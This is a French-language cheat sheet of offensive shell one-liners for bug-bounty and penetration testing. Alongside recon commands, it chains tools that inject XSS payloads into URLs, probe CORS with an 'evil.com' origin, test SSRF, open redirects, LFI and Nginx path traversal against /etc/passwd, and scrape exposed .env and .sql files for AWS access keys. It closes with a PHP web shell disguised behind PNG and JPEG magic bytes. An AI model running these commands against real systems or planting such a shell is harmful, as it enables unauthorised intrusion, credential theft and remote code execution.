☝️One liners

One liners

Extraction d'URL depuis le code source

curl "https://target.com/" | grep -oP '(https*://|www\.)[^]*'

Recherche de sous-domaines

curl 'https://crt.sh/?q=%.target.com&output=json' | jq '.name_value' |sed 's/\"//g' | sed 's/\*\.//g' | sort -u

Recherche de endpoints

#API Angular
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Filtrage de endpoints

cat endpoints.txt | grep -i "admin\|login\|staging\|dashboard\|Admin\|\.asp\|\.php\|\.json\|cgi\|\.xml\|\.sql\|\.db\|\.rb\|\.py\|\.sh\|\.yml\|\.yaml\|\.ini\|\.md\|\.\js\|\.cfg\|env\|.\xls\|\.pdf\|\.docx" | anew interesting_path.txt

Utiliser les mots clés voulu dans la fonction grep.

Screenshots d'un range d'IP

IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done

Générateur de wordlist adapté à la cible

echo "target.com" | subfinder -silent | httpx | hakrawler | sed $'s/[./?=:&#]/\\\n/g' | anew wordlist.txt

XSS scanner

echo "target.com" | waybackurls | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

gau target.com | uro | grep '?' | sed -e 's/:80//g' -e 's/:443//g' -e 's/http:/https:/g' -e 's/=/=Sirat%22%3E%3CH1%3Exss123/g' | httpx -silent -ms '<h1>xss123'

echo "target.com" | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

cat targets.txt | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silent --skip-mining-dom --ignore-return 302,404,403

waybackurls target.com | grep "=" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'

CORS scanner

assetfinder target.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null

SSRF scanner

#pip3 install queryswap

echo "domain" | hakrawler -d 5 | grep "=" |python3 -m qs http%3a%2f%2fmy.burp.net

Open redirect

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I% -P 25 sh -c 'curl -ls "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

echo "https://target.com" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"

LFI

gau target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Nginx Path Traversal

cat urls.txt | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888,8081 -path "///////../../../etc/passwd" -mr "root:x" -silent | anew output.txt
httpx -l urls.txt -path "///////../../../../../etc/passwd -sc -mc 200 'root:'

Enregistrements CNAME

cat live-domains.txt | while read domains;do dig $domains;done | grep CNAME | tee -a CNAME_Records     

Trouver des clés d'accès d'utilisateurs IAM (AWS)

echo target.com | subfinder -silent | httpx -silent -path ".env","mysql_history","echo $(echo $(</dev/stdin) | cut -d "." -f2).sql" -mc200 -ports 80,443,8080,8443 | grep -E -i "AKIA[A-Z0-9]{16}"

RCE dans fichier png

echo -n '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.png

echo -n '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png

Dernière mise à jour